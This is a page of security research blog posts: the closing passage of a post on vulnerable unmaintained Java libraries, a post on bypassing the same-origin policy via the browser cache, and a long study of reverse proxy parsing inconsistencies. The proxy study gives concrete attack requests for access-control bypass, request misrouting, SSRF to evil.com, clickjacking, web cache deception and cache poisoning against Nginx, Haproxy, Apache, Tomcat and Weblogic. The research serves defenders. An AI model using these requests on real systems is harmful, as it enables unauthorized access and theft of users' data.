If you use Google to search for this term, you will find that almost every search result is related to SAP Hybris. SAP Hybris is a major eCommerce/CRM platform used by many large enterprises. By default, SAP Hybris exposes the vjdbc-servlet that is vulnerable to an RCE caused by Java deserialization – CVE-2019-0344 (and which had other serious security issues in the past as well). A test for this vulnerability was added to Acunetix in September 2019. Unfortunately, it looks like SAP fixed only their internal version of VJDBC, and therefore all other software that depends on this library is vulnerable and its creators are probably unaware of the problem.

No Way Out

I was unable to report the vulnerabilities in these libraries. For example, in the case of JMXMP, Oracle doesn’t support JDMK anymore at all. The only thing I could do was send reports directly to big projects that use these vulnerable libraries. I also wanted to use this article to increase awareness, so please share it if you believe any of your colleagues might be using these libraries.

If you still rely on these libraries, try to find a safe alternative. If it’s impossible, restrict access to them and/or use process-level filters described in JEP-290 to protect against deserialization and/or put the application in a sandbox. Also, since these are open-source libraries, you can patch them manually.

Also, whenever you’re planning to use a package/library, make sure that it’s still supported and that there are still maintainers. In all the above cases, if maintainers still supported these projects, they could easily find and fix such vulnerabilities.

It would also be great if in the future Java and other languages would get a centralized method for reporting vulnerabilities in public packages/libraries, similar to the excellent central reporting system for Node.js.

вторник, 30 апреля 2019 г.

Bypassing SOP Using the Browser Cache

(It's a repost from https://www.acunetix.com/blog/web-security-zone/bypassing-sop-using-the-browser-cache/)

Misconfigured caching can lead to various vulnerabilities. For example, attackers may use badly-configured intermediate servers (reverse proxies, load balancers, or cache proxies) to gain access to sensitive data. Another way to exploit caching is through Web Cache Poisoning attacks.

The browser cache may look like a very safe place to temporarily store private information. The primary risk is that an attacker may gain access to it through the file system, which is usually considered a low-hazard vulnerability. However, in some cases, misconfigured cache-related headers may cause more serious security issues.

Cross-Domain Interaction Risks

Some websites have several subdomains and need to share data between them. This is normally not possible due to the same-origin policy (SOP). There are some methods that enable such cross-domain interaction, for example, JSONP (JSON with Padding). Developers who use such methods must implement some kind of protection against data leaking to other sites.

Let’s say that an example site has two subdomains: blog.example.com and account.example.com. The account.example.com site has a JSONP endpoint that returns sensitive user data on the basis of the user cookie. To prevent leaks, this endpoint verifies the Referer header against a whitelist that includes blog.example.com.

With this setup, if the user is lured to visit a malicious site, the attacker cannot directly steal sensitive data. However, if the JSONP endpoint sets cache-related headers, the attacker may be able to access private information from the browser cache.

Browser Behavior

Browsers have slightly different cache implementations but certain aspects are similar. First of all, only GET responses may be cached. When the browser gets the response to its GET request, it checks response headers for caching information:
  • If the response contains a Cache-Control: private or Cache-Control: public header, the response is cached for the number of seconds specified in Cache-Control: max-age=<seconds>.
  • If the response contains an Expires header, the response is cached according to its value (this header has a lower priority than Cache-Control).
  • If neither of these headers is present, some browsers may check the Last-Modified header and typically cache the response for ten percent of the difference between the current date and the Last-Modified date.
  • If there are no cache-related headers at all, the browser may cache the response but usually revalidates it before using it.
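The Last-Modified heuristic from the list above can be sketched in a few lines (heuristic_freshness is my name for it; real browsers differ in the details, but the 10% factor matches the common heuristic):

```python
from datetime import datetime, timedelta

def heuristic_freshness(now: datetime, last_modified: datetime) -> timedelta:
    # With no Cache-Control or Expires header, browsers may reuse the
    # response for roughly 10% of the time since Last-Modified.
    return (now - last_modified) / 10

now = datetime(2019, 4, 30, 12, 0, 0)
last_modified = datetime(2019, 4, 20, 12, 0, 0)  # 10 days earlier
print(heuristic_freshness(now, last_modified))   # 1 day, 0:00:00
```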
Problems may arise due to the fact that there is just one browser cache for all websites and it uses only one key to identify data: a normalized absolute URI (scheme://host:port/path?query). This means that the browser cache has no additional information about the request that initiated a particular response (for example, the site/origin from which it came, the JavaScript function or tag that initiated it, the associated cookies or headers, etc.). Any site gets the cached response from account.example.com as long as it initiates a GET request to the same URI.
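A minimal model of this keying behavior (cache_key is my illustrative name; real browser implementations differ in details) shows that the requesting origin never enters the key:

```python
from urllib.parse import urlsplit

def cache_key(url: str) -> str:
    # The cache is keyed only by the normalized absolute URI:
    # scheme://host:port/path?query - nothing about the requesting origin.
    u = urlsplit(url)
    port = u.port or (443 if u.scheme == 'https' else 80)
    key = f"{u.scheme}://{u.hostname}:{port}{u.path or '/'}"
    if u.query:
        key += '?' + u.query
    return key

# A request initiated from blog.example.com and one initiated from a
# malicious site produce the same key, so the second request gets the
# first one's cached response:
assert cache_key('https://account.example.com/user.jsonp') == \
       cache_key('https://account.example.com:443/user.jsonp')
```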

The Anatomy of the Attack

The following is a step-by-step explanation of how this vulnerability is used for an attack:
  1. The user visits blog.example.com.
  2. A script on blog.example.com needs user account information.
  3. The user’s browser sends a request to the JSONP endpoint at account.example.com.
  4. The response from the JSONP endpoint at account.example.com contains cache-related headers.
  5. The user’s browser caches the response content.
  6. The user is lured to a malicious site.
  7. The malicious site contains a script that points to the JSONP endpoint at account.example.com.
  8. The browser returns the cached response to the script at the malicious site.
In this situation, the Referer header is never checked because the response comes from the cache. Therefore, the attacker gains access to cached private information.



Similar Vulnerabilities

The same approach may be used to exploit other variations of Cross-Site Script Inclusion (XSSI) and other SOP Bypass attacks. Such attacks may bypass other server-side checks, for example, the Origin header, the SameSite cookie attribute, or custom headers.

Let us assume that account.example.com uses Cross-Origin Resource Sharing (CORS) instead of the JSONP endpoint. It returns an Access-Control-Allow-Origin: * header but uses a special token from a custom header to authenticate the user and protect sensitive data.

If responses are cached, the attacker may steal private information by making a request to the same URI. There is no CORS protection (due to Access-Control-Allow-Origin: *) and the user’s browser will return cached data without checking for the custom header token.
You can see how these vulnerabilities work in practice by analyzing the outputs of the browser console at a dedicated test site.

How To Protect Against SOP Bypass

The described SOP bypass vulnerability is caused by misconfiguration. In the case of cross-origin interactions, you should disable the browser cache. Most frameworks and ready-made scripts either don’t set cache-related headers or set them correctly by default (Cache-Control: no-store). However, you should always double-check these headers to be secure.

Browser vendors are now considering or implementing a stricter approach to caching. Hopefully, this change will prevent such cross-origin leaks.

The tricks invented for the purposes of this article were inspired by the HTTP Cache Cross-Site Leaks article by Eduardo Vela.

вторник, 22 января 2019 г.

A Fresh Look On Reverse Proxy Related Attacks


In recent years, several research papers have been published about attacks directly or indirectly related to reverse proxies. While implementing various reverse proxy checks in our scanner, I started analyzing implementations of reverse proxies.

Initially, I wanted to analyze how both reverse proxies and web servers parse requests, find inconsistencies between them, and use this knowledge for some kind of bypasses. Unfortunately, I got stuck analyzing web servers and application servers due to too many possible variations. For example, the Apache web server behaves differently depending on how you connect it with PHP. The implementation of a web application, or the framework or middleware it uses, can influence request parsing as well. In the end, I realized that some attacks are still little-known or completely unknown.

The goal of this research is to portray the bigger picture of potential attacks on a reverse proxy or the back-end servers behind it. In the main part of the article, I will show some examples of vulnerable configurations and exploitation of attacks on various reverse proxies. The second goal of the research is to share raw data about various implementations of reverse proxies so that you can find your own ways/tricks (depending on the back-end server in each specific situation).

Terms

Actually, this research is not only about reverse proxies, but also about load balancers, cache proxies, WAFs, and other intermediate servers between a user and a web application which parse and forward requests. However, I haven’t found a good term which correctly describes such a server and is well-known in the community, so I will use “reverse proxy” even when I talk about load balancers or cache proxies. I will call a web application behind a reverse proxy a back-end server. Be aware that a back-end server is also known as an origin server (this will make sense when we start talking about caching).

 

What is a reverse proxy?

 

How proxies work

The basic idea of a reverse proxy is quite simple. It’s an intermediate server between a user and a back-end server. Its purpose can vary: it can route requests to various backends depending on the URL, it can just be there “to protect” against some attacks, or it can simply analyze traffic. The implementations can be different too, but the main sequence of steps is roughly the same: a reverse proxy must receive a request, process it, perform some actions on it, and forward it to a backend.

Processing of a request consists of several main steps:

 

A) 1. Parsing
When a reverse proxy receives a request, it must parse it: get the verb, the path, the HTTP version, the Host header, the other headers, and the body.
GET /path HTTP/1.1
Host: example.com
Header: something
Everything may look quite simple, but if you dive into the details, you will see that implementations differ.

Some examples:

– If a reverse proxy supports Absolute-URI, how will it parse it? Does the Absolute-URI have a higher priority than the Host header?:
GET http://other_host_header/path HTTP/1.1
Host: example.com
 – A URL consists of scheme:[//authority]path[?query][#fragment], and browsers don’t send the #fragment part. But how must a reverse proxy handle #fragment?

Nginx throws the fragment away, Apache returns a 400 error (due to the # in the path), and some others handle it as an ordinary symbol.

– How does it handle symbols which must be URL-encoded?
GET /index.php[0x01].jsp HTTP/1.1
2. URL decoding
According to the standards, symbols with a special meaning in the URL must be URL-encoded (%-encoding), like the double quote (") or the “greater than” sign (>). But in practice, any symbol can be URL-encoded and sent in the path part. Many web servers perform URL decoding while processing a request, so the following requests will be treated in the same way by them.
GET /index.php HTTP/1.1
GET %2f%69%6e%64%65%78%2e%70%68%70 HTTP/1.1
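You can reproduce this equivalence with Python’s standard library, which mirrors what a decoding server does with the two requests above:

```python
from urllib.parse import quote, unquote

# The fully %-encoded path decodes to the plain one:
encoded = '%2f%69%6e%64%65%78%2e%70%68%70'
print(unquote(encoded))              # /index.php

# And any character can be %-encoded, not just the "special" ones:
print(quote('/index.php', safe='')) # %2Findex.php
```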
 3. Path normalization
Many web servers support path normalization. Main cases are well-known:
/long/../path/here -> /path/here
/long/./path/here -> /long/path/here
But what about /..? For Apache, it’s an equivalent of /../, but for Nginx it means nothing.
/long/path/here/.. -> /long/path/ - Apache
/long/path/here/.. -> /long/path/here/.. - Nginx
The same goes for // (an “empty” directory). Nginx converts it to just one slash /, but, if it’s not the first slash, Apache treats it as a directory.
//long//path//here -> /long/path/here - Nginx
//long/path/here -> /long/path/here - Apache
/long//path/here -> /long//path/here - Apache
There are also some additional (weird) features supported by some web servers. For example: path parameters (/..;/ is valid for Tomcat and Jetty) or traversal with a backslash (\..\).
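Python’s posixpath.normpath implements one such normalization policy, which makes it handy for checking the cases above; note that it happens to match Apache for the trailing /.. case and Nginx for slash merging, so no single call models every server:

```python
import posixpath

# normpath resolves "." and ".." and merges duplicate slashes:
assert posixpath.normpath('/long/../path/here') == '/path/here'
assert posixpath.normpath('/long/./path/here') == '/long/path/here'

# Trailing "..": normpath pops the last segment, like Apache
# (Nginx would leave '/long/path/here/..' untouched):
assert posixpath.normpath('/long/path/here/..') == '/long/path'

# Inner "//": normpath merges it, like Nginx (Apache would keep
# '/long//path/here' as-is). The point is exactly that servers disagree:
assert posixpath.normpath('/long//path/here') == '/long/path/here'
```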

B) Applying rules and performing actions on a request

Once a request is processed, the reverse proxy can perform some actions on it according to its configuration. It is important to note that in many cases, the rules of a reverse proxy are path-based (location-based): if the path is pathA, do one thing; if it is pathB, do another.

Depending on the implementation or configuration, a reverse proxy applies rules based either on the processed (parsed, URL-decoded, normalized) path or on the unprocessed path (a rare case). It is also important for us to note whether matching is case-sensitive. For example, will the following paths be treated equally by a reverse proxy?:
/path1/ == /Path1/ == /p%61th1/ == /lala/../path1/
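Assuming the proxy matches rules on the decoded, normalized path and case-insensitively (an assumption that depends on the implementation; processed is my name for the pipeline), all four paths collapse to the same value:

```python
import posixpath
from urllib.parse import unquote

def processed(path: str) -> str:
    # Decode %-escapes, resolve "."/".." segments, then lowercase:
    return posixpath.normpath(unquote(path)).lower()

assert processed('/path1/') == '/path1'
assert processed('/Path1/') == '/path1'
assert processed('/p%61th1/') == '/path1'
assert processed('/lala/../path1/') == '/path1'
```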

C) Forwarding to a back-end

The reverse proxy has processed a request, found the appropriate rules for it, and performed the necessary actions. Now it must send (forward) the request to a backend. Will it send the processed request or the initial one? Obviously, if it has modified the request, it sends the modified version, but in this case, it must perform all the necessary steps, for example, URL-encode special symbols. But if the reverse proxy just forwards all requests to a single backend, maybe forwarding the initial request is a good idea?

As you can see, all these steps are quite obvious and there are not that many variations. Still, there are differences in implementations, which we, as attackers, can use for our goals.

Therefore, the idea of all the attacks described below is that a reverse proxy processes a request, finds and applies rules, and forwards it to a backend. If we find an inconsistency between the way the reverse proxy processes a request and the way the backend processes it, we can craft a request (path) which is interpreted as one path by the reverse proxy and as a completely different path by the backend. This lets us bypass, or forcibly apply, some of the reverse proxy’s rules.

Here are some examples

Nginx

Nginx is a well-known web server, but it is also very popular as a reverse proxy. Nginx supports Absolute-URI with an arbitrary scheme and gives it a higher priority than the Host header. Nginx parses, URL-decodes, and normalizes the request path. It then applies location-based rules depending on the processed path.

But it looks like Nginx has two main behaviors and each of them has its own interesting features:

- With trailing slash
location / {
    proxy_pass http://backend_server/;
}
In this configuration, Nginx forwards all requests to the `backend_server`. It sends the processed request to the backend, which means Nginx must URL-encode the necessary symbols. The interesting thing for an attacker is that Nginx doesn’t encode all the symbols which browsers usually do. For example, it doesn’t URL-encode ' " < >.

Normally, even if a web application (back-end server) takes a parameter from the path and is vulnerable to XSS, an attacker cannot exploit it, because modern browsers (except for dirty tricks with IE) URL-encode these symbols. But with Nginx as a reverse proxy, an attacker can force a user to send a URL-encoded XSS payload in the path. Nginx decodes it and sends the decoded version to the back-end server, which makes exploitation of the XSS possible.
Browser -> http://victim.com/path/%3C%22xss_here%22%3E/ -> Nginx -> http://backend_server/path/<"xss_here">/ -> WebApp
- Without trailing slash
location / {
    proxy_pass http://backend_server;
}
The only difference between this config and the previous one is the lack of the trailing slash. Although seemingly insignificant, it forces Nginx to forward the unprocessed request to the backend. So if you send /any_path/../to_%61pp#/path2, after processing the request, Nginx will try to find a rule for `/to_app`, but it will send /any_path/../to_%61pp#/path2 to the backend. Such behavior is useful for finding inconsistencies.
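A rough model of this mismatch (the split/decode/normalize pipeline below is my simplification of what Nginx does internally):

```python
import posixpath
from urllib.parse import unquote

raw = '/any_path/../to_%61pp#/path2'

# Nginx matches location rules on the processed path:
# fragment stripped, %-decoded, normalized...
matched = posixpath.normpath(unquote(raw.split('#')[0]))
assert matched == '/to_app'

# ...but with "proxy_pass http://backend;" (no trailing slash),
# it forwards the raw, unprocessed path:
forwarded = raw
assert forwarded == '/any_path/../to_%61pp#/path2'
```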

Haproxy

Haproxy is a load balancer (with HTTP support). It doesn’t make much sense to compare it to Nginx, but it will give you an idea of a different approach.

Haproxy performs minimal processing of a request: there is no “real” parsing, URL decoding, or normalization. It doesn’t support Absolute-URI either.

Therefore, it takes everything (with few exceptions) between the verb and the HTTP version (GET !i<@>?lala=#anything HTTP/1.1) and, after applying rules, forwards it to a back-end server. However, it supports path-based rules and allows modifying requests and responses.

How proxies are used

While I was working on this research, analyzing various configurations of reverse proxies, I came to the conclusion that we can both bypass and apply rules of a reverse proxy. Therefore, to understand the real potential of reverse proxy related attacks, we must have a look at their capabilities.

First of all, a reverse proxy has access to both a request and a response (including those which it sends/receives from a backend server). Secondly, we need a good understanding of all the features which a reverse proxy supports and how people configure them.

How can a reverse proxy handle a request?:
  1. Routing to endpoint. It means that a reverse proxy receives a request on one path (/app1/), but forwards the request to a completely different one (/any/path/app2/) on a backend. Or it forwards the request to a specific backend depending on a Host header value.
  2. Rewriting path/query. This is similar to the previous one, but usually involves different internal mechanisms (regexp)
  3. Denying access. When a reverse proxy blocks a request to a certain path.
  4. Headers modification. In some cases, a reverse proxy may add or change headers of the request. This could be a cool feature for an attacker, but it’s hard to exploit with a black-box approach.
How can a reverse proxy handle a response?:
  1. Cache. Many reverse proxies support caching of response.
  2. Headers modification. Sometimes a reverse proxy adds or modifies response headers (even security-related ones), because it cannot be done on the back-end server.
  3. Body modification. Reverse proxies will sometimes modify the body too. Edge Side Includes (ESI) is an example of when this can happen.
All this is important not only to see more potential attacks, but also to understand that in many cases we don’t need to bypass rules, but to apply them. This leads to a new type of attack on reverse proxies: proxy rule misuse.

Server-Side attacks

Bypassing restriction

This is the best-known type of reverse proxy related attack.

When someone restricts access (3. Denying access), an attacker needs to bypass it.

Here is an example.
Let’s imagine that Nginx is used as a reverse proxy and Weblogic as a back-end server. Nginx blocks access to the administrative interface of Weblogic (everything that starts with /console/).
Configuration:

location /console/ {
    deny all;
    return 403;
} 
location / {
    proxy_pass http://weblogic;
}
As you can see, proxy_pass here is without a trailing slash, which means that the request is forwarded unprocessed. Another important point for bypassing the restriction is that Weblogic treats # as an ordinary symbol. Therefore, an attacker can access the administrative interface of Weblogic by sending the following request:
GET /#/../console/ HTTP/1.1
When Nginx processes the request, it throws away everything after #, so it skips the /console/ rule. It then forwards the unprocessed path (/#/../console/) to Weblogic; Weblogic processes the path, and after path normalization we are left with /console/.
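Both views of the request can be reproduced with a simplified model of each parser (the split and normpath calls stand in for the real implementations):

```python
import posixpath

path = '/#/../console/'

# Nginx treats everything after '#' as a fragment and drops it,
# so the deny rule for /console/ never matches:
nginx_view = path.split('#')[0]
assert nginx_view == '/'

# Weblogic treats '#' as an ordinary character and normalizes the
# full path, ending up at the admin console:
weblogic_view = posixpath.normpath(path)
assert weblogic_view == '/console'
```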

Request Misrouting

It’s about “1. Routing to endpoint” and, in some cases, “2. Rewriting path/query”.
When a reverse proxy forwards requests to only one endpoint, it can create the illusion that an attacker cannot reach other endpoints on the backend, or a completely different backend.

Example 1.
Let’s have a look at a similar combination: Nginx + Weblogic. In this case, Nginx proxies requests only to a certain endpoint of Weblogic (http://weblogic/to_app). So only requests that come to the /to_app path on Nginx are forwarded to the same path on Weblogic. In this situation, it may look like Weblogic’s administrative interface (console) and other paths are not accessible to an attacker.
location /to_app {
    proxy_pass http://weblogic;
}
In order to misroute requests to other paths, we again need to know two things. Firstly, as in the example above, proxy_pass is used without a trailing slash.

Secondly, Weblogic supports “path parameters” (https://tools.ietf.org/html/rfc3986#section-3.3). For example, /path/to/app/here;param1=val1, and param1 will be accessible in a web app through API.

I think many are aware of this feature (especially after Orange Tsai’s BlackHat presentation) in the context of Tomcat. Tomcat allows you to perform really “weird” traversals like /..;/..;/. But Weblogic treats path parameters differently: it treats everything after the first ; as a path parameter. Does this mean that the feature is useless for an attacker?

Nope. Let’s have a look at this “magic” which allows accessing any path on Weblogic in this configuration.
GET /any_path_on_weblogic;/../to_app HTTP/1.1
When Nginx receives such a request, it normalizes the path: from /any_path_on_weblogic;/../to_app it gets /to_app, which matches the rule. But Nginx forwards /any_path_on_weblogic;/../to_app, and Weblogic, during parsing, treats everything after ; as a path parameter, so Weblogic sees /any_path_on_weblogic. If necessary, an attacker can go “deeper” by increasing the number of /../ sequences after ;.
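The same mismatch, modeled in a couple of lines (a simplification; the real parsers are more involved):

```python
import posixpath

path = '/any_path_on_weblogic;/../to_app'

# Nginx: normalize the path, then match location rules against it:
assert posixpath.normpath(path) == '/to_app'

# Weblogic: everything after the first ';' is a path parameter,
# so the request is served from a completely different location:
assert path.split(';')[0] == '/any_path_on_weblogic'
```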

Example 2.
This one is about a “bug” in Nginx. But this “bug” is just a consequence of how Nginx works (so it will not be fixed).

A rule location /to_app means that all paths which start with /to_app (the prefix) fall under the rule: /to_app, /to_app/, /to_app_anything (including special symbols). Also, everything after this prefix (/to_app) is taken and concatenated with the value in proxy_pass.
Look at the following config. After processing /to_app_anything, Nginx will forward the request to http://server/any_path/_anything.
location /to_app {
    proxy_pass http://server/any_path/;
}
If we put both features together, we can see that we can reach any path one level higher on almost any backend. We just need to send:
GET /to_app../other_path HTTP/1.1
Nginx applies the /to_app rule, takes everything after the prefix (../other_path), concatenates it with the value from proxy_pass, and forwards http://server/any_path/../other_path to the backend. If the backend normalizes the path, we can reach a completely different endpoint.
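The concatenation can be sketched as follows (a simplified model of Nginx’s prefix handling, using the config values from above):

```python
import posixpath

prefix = '/to_app'
raw = '/to_app../other_path'

# Nginx prefix-matches the location, then appends everything after
# the prefix to the proxy_pass value:
assert raw.startswith(prefix)
forwarded = 'http://server/any_path/' + raw[len(prefix):]
assert forwarded == 'http://server/any_path/../other_path'

# If the backend normalizes the path, the request escapes /any_path/:
assert posixpath.normpath('/any_path/../other_path') == '/other_path'
```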

Actually, this trick is similar to the well-known alias trick. However, the idea here is to show an example of possible misuse of a reverse proxy’s features.

Example 3.
As I mentioned before, it’s a common case when a reverse proxy routes requests to different backends depending on the Host header in a request.

Let’s have a look at a Haproxy configuration which says that all requests with example1.com in the Host header must be proxied to the backend example1_backend (192.168.78.1:9999).
frontend http-in
    acl host_example1 hdr(host) -i example1.com
    use_backend example1_backend if host_example1

backend example1_backend
    server server1 192.168.78.1:9999 maxconn 32
Does such a configuration mean that an attacker cannot access other virtual hosts of the backend server? It may look like that, but an attacker can easily do so, because, as mentioned above, Haproxy doesn’t support Absolute-URI, but most web servers do. When Haproxy receives an Absolute-URI, it forwards this unprocessed Absolute-URI to the backend. Therefore, just by sending the following request, we can easily access other virtual hosts of the backend server:
GET http://unsafe-value/path/ HTTP/1.1
Host: example1.com
Is it possible to force a reverse proxy to connect to an arbitrary backend server? I’d say that in most cases (Nginx, Haproxy, Varnish) this cannot be done, but Apache (in some configurations/versions) is vulnerable to it. Since Apache “parses” the host value from ProxyPass, we can send something like GET @evil.com HTTP/1.1, so Apache sees the value http://backend_server@evil.com and sends the request to `evil.com` (SSRF). Here you can see an example of such a vulnerability.
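Python’s URL parser illustrates why the concatenated value connects to evil.com: everything before @ becomes userinfo, not the host:

```python
from urllib.parse import urlsplit

# What Apache effectively sees after concatenating the ProxyPass
# value with the attacker-controlled "@evil.com":
u = urlsplit('http://backend_server@evil.com')
assert u.username == 'backend_server'  # original backend becomes userinfo
assert u.hostname == 'evil.com'        # actual connection target (SSRF)
```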

Client-Side attacks

If we have a look at reverse proxy features again, we can see that all the response-related ones have potential for client-side attacks. This doesn’t make them useless; I’d say otherwise. But client-side attacks have an additional limitation on possible inconsistencies between the reverse proxy and the web server, as the browser processes a request before sending it.

Browser processing

In a client-side attack, an attacker needs to force a victim’s browser to send to a server a special request which will influence the response. But the browser follows the specifications and processes the path before sending it: the browser parses the URL (e.g. throws away the fragment part), URL-encodes all the necessary symbols (with some exceptions), and normalizes the path. Therefore, to perform such attacks, we can only use a “valid” request which fits into the inconsistency between the three components (browser, reverse proxy, back-end server).

Of course, there are differences in browser implementations, plus some features which still allows us to find such inconsistencies:
  • For example, Chrome and IE don’t decode %2f, so a path like /path/anything/..%2f../ will not be normalized.
  • Older versions of Firefox didn’t URL-decode special symbols before normalization, but now it behaves similarly to Chrome.
  • There is information that Safari doesn’t URL-decode the path, so we can force it to send a path like /path/%2e%2e/another_path/.
  • Also, IE, as usual, has some magic: it doesn’t process the path when it’s redirected with a Location header.

Misusing Header modification

A common task for a reverse proxy is to add, delete, or modify headers in a response from the backend. In some situations, it’s much easier than modifying the backend itself. Sometimes this involves modification of security-important headers. So, as attackers, we may want to force a reverse proxy to apply such rules to the wrong responses (from the wrong backend locations) and then use this for attacks on other users.

Let’s imagine that we have Nginx and Tomcat as a backend. Tomcat, by default, sets the X-Frame-Options: deny header, so a browser cannot open it in an iframe. For some reason, a part of the web application (/iframe_safe/) on Tomcat must be accessible through an iframe, so Nginx is configured to delete the X-Frame-Options header for this part. As there is nothing sensitive under /iframe_safe/, there is no potential for clickjacking attacks on it. Here is the configuration:
location /iframe_safe/ {
    proxy_pass http://tomcat_server/iframe_safe/;
    proxy_hide_header "X-Frame-Options";
}
location / {
    proxy_pass http://tomcat_server/;
}
However, as attackers, we can make a request which falls under the iframe_safe rule, but it will be interpreted by Tomcat as a completely different location. Here it is:
<iframe src="http://nginx_with_tomcat/iframe_safe/..;/any_other_path">
A browser doesn’t normalize such a path. For Nginx, it falls under the iframe_safe rule. But since Tomcat supports path parameters, after path normalization it will get /any_other_path. Therefore, in such a configuration, any path on Tomcat can be iframed, so an attacker can perform clickjacking attacks on users.
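Modeling Tomcat’s per-segment stripping of path parameters shows how the request escapes /iframe_safe/ (a simplified model; real servlet containers do more):

```python
import posixpath

path = '/iframe_safe/..;/any_other_path'

# Nginx: the prefix match on /iframe_safe/ succeeds as-is
# (a browser does not normalize "..;" either):
assert path.startswith('/iframe_safe/')

# Tomcat: drop the ";param" part of every segment, then normalize:
stripped = '/'.join(seg.split(';')[0] for seg in path.split('/'))
assert stripped == '/iframe_safe/../any_other_path'
assert posixpath.normpath(stripped) == '/any_other_path'
```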

Of course, with a similar approach, other security-related headers (e.g. CORS, CSP, etc) might be misused too.

Caching

Caching is one of the most interesting features of reverse proxies, with good potential for various attacks, but it is still little-known. Recently, cache-related attacks have gotten more attention in some excellent research, including Web Cache Deception and Practical Web Cache Poisoning. In my research, I’ve been focusing on caching too: I wanted to analyze various implementations of cache. As a result, I’ve got several ideas on how to improve both cache deception and cache poisoning attacks.

How it works
There are several aspects of reverse proxy caches that help us understand the attacks.
The idea of caching is quite simple. In some situations, a reverse proxy stores a response from a backend in its cache and then returns the same response from the cache without accessing the backend. Some reverse proxies support caching by default; some require configuration. Generally, a reverse proxy uses as the cache key the concatenation of the Host header value with the unprocessed path/query from the request.
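A simplified sketch of how such a cache key is typically built (the exact details vary between proxies; this is a generic model, not any specific proxy's code):

```python
def cache_key(host_header, raw_path_and_query):
    # Typical key: Host header value + unprocessed path/query, verbatim
    return host_header + raw_path_and_query

# Two raw paths that a backend may normalize to the same resource
# still produce two different cache entries:
print(cache_key("example.com", "/index.jsp"))
print(cache_key("example.com", "/images/..;/index.jsp"))
```

Because the path goes into the key unprocessed, any path the backend later normalizes away still gets its own cache slot, which the attacks below rely on.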

To decide whether it is OK to cache a response, most reverse proxies check the Cache-Control and Set-Cookie headers in the backend’s response. Reverse proxies don’t store responses with Set-Cookie at all; Cache-Control, on the other hand, describes the caching policy and requires additional parsing. The format of the Cache-Control header is quite complex, but basically it has several flags that allow or forbid caching and set how long a response can be cached.

A Cache-Control header may look like one of these:
Cache-Control: no-cache, no-store, must-revalidate 
Cache-Control: public, max-age=31536000
The first example forbids caching by a reverse proxy; the second allows it. The absence of a Cache-Control header usually means that a reverse proxy is allowed to store a response.
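The decision logic described above can be sketched roughly as follows (a deliberately simplified model; real proxies implement many more directives from RFC 7234):

```python
def may_cache(response_headers):
    # Model of a typical reverse proxy's store-or-not decision
    headers = {k.lower(): v for k, v in response_headers.items()}
    if "set-cookie" in headers:
        return False  # responses that set cookies are not stored at all
    directives = {d.strip().split("=")[0]
                  for d in headers.get("cache-control", "").lower().split(",")}
    # Restrictive flags forbid storing the response
    if directives & {"no-store", "no-cache", "private"}:
        return False
    # No Cache-Control header usually means caching is allowed
    return True
```

For example, `may_cache({"Cache-Control": "public, max-age=31536000"})` returns True, while a `no-store` response or any response carrying Set-Cookie returns False.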

Many web servers, application servers, and frameworks set Cache-Control headers automatically and correctly. In most cases, if a web app uses a session in a script, the server will set Cache-Control headers that restrict caching, so programmers usually don’t need to think about it. However, in some situations, for example, if a web application uses its own session mechanism, the Cache-Control header can be set incorrectly.

Attacks
A commonly used feature of reverse proxy caches is “aggressive caching” (not an official term, but it describes the idea). In some cases (for example, when a backend is too strict about caching and doesn’t allow anything to be cached), an administrator, instead of changing the backend, changes the rules of the reverse proxy so that it starts caching responses even when the Cache-Control header restricts caching. Usually such rules have some limitations: for example, caching only responses with certain extensions (.jpg, .css, .js) or from specific paths (/images/).

If a reverse proxy has a path-based rule that allows aggressive caching, an attacker can craft a path that falls under the rule but is interpreted as a completely different path by the backend server.

As an example, let’s take Nginx + Tomcat again. The following rule is intended to force Nginx to cache all responses from the /images directory of Tomcat:
location /images {
    proxy_cache my_cache;
    proxy_pass http://tomcat_server;
    proxy_cache_valid 200 302 60m;
    proxy_ignore_headers Cache-Control Expires;
}
As attackers, we can misuse this rule to perform a web cache deception attack. All we need to do is force a victim to open the following URL (using an img tag, for example):
<img src="http://nginx_with_tomcat.com/images/..;/index.jsp">
The victim’s browser then sends a request (with authentication cookies). Nginx sees /images, so it forwards the request to Tomcat and then caches the response (ignoring the Cache-Control headers). Again, for Tomcat, the path after normalization is completely different: /index.jsp. In this way, an attacker can force Nginx to cache any page of Tomcat. To read the cached response, the attacker just needs to access the same path (/images/..;/index.jsp), and Nginx returns the victim’s sensitive data (e.g. a CSRF token).
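The whole flow can be modeled end to end in a few lines (a toy simulation of the caching rule and Tomcat's path handling under the assumptions above, not real server code):

```python
from posixpath import normpath

cache = {}

def tomcat(raw_path):
    # Strip ";param" path parameters, then normalize ".." segments
    stripped = "/".join(seg.split(";", 1)[0] for seg in raw_path.split("/"))
    return "page for " + normpath(stripped)

def nginx(host, raw_path):
    key = host + raw_path                  # cache key uses the raw path
    if raw_path.startswith("/images"):     # aggressive caching rule
        if key not in cache:
            cache[key] = tomcat(raw_path)  # Cache-Control is ignored here
        return cache[key]
    return tomcat(raw_path)

# 1. The victim's browser (with auth cookies) is lured into this request:
victim_view = nginx("nginx_with_tomcat.com", "/images/..;/index.jsp")
# 2. The attacker replays the same raw path and gets the cached victim page:
attacker_view = nginx("nginx_with_tomcat.com", "/images/..;/index.jsp")
print(attacker_view)  # page for /index.jsp
```

The second request never reaches the backend: the raw path matches the cache key stored during the victim's visit.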

In some ways, this is just a variation of web cache deception, but that’s not all.

Let’s think about a cache poisoning attack. The attack relies on finding unkeyed values in a request that can significantly (from a security point of view) influence a response; at the same time, this response must be cached by the reverse proxy, so the Cache-Control header must be permissive. If we mix everything together, we will be able to find more ways to exploit cache poisoning attacks.

Let’s imagine the situation. There is Nuster (a caching proxy based on HAProxy) and a web application. The web application has a self-XSS vulnerability (which works only in the attacker’s account) in /account/attacker/. Nuster is configured to cache all responses from the /img/ directory of the web application:
nuster cache on
nuster rule img ttl 1d if { path_beg /img/ }
The attacker just needs to create a special URL (/img/..%2faccount/attacker/): Nuster applies the “aggressive caching” rule, while the web app returns the self-XSS response (it sees /account/attacker/). The response with the XSS payload will be cached by Nuster (with the key Host + /img/..%2faccount/attacker/), so the attacker will be able to misuse this cache to attack other users of the web application with XSS. From a self-XSS, we’ve got a regular XSS.
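The key to this variant is the %2f encoding: the path_beg check runs on the still-encoded path, while the web application decodes and then normalizes it. A quick sketch of the two views (assumed behavior; the exact decoding point varies between applications):

```python
from urllib.parse import unquote
from posixpath import normpath

raw = "/img/..%2faccount/attacker/"

# The caching rule checks the raw path, where "%2f" is just three characters:
rule_applies = raw.startswith("/img/")

# The web app decodes "%2f" into "/" and then normalizes the result:
app_path = normpath(unquote(raw))

print(rule_applies)  # True: the response is cached under Host + raw path
print(app_path)      # /account/attacker: the self-XSS page is served
```

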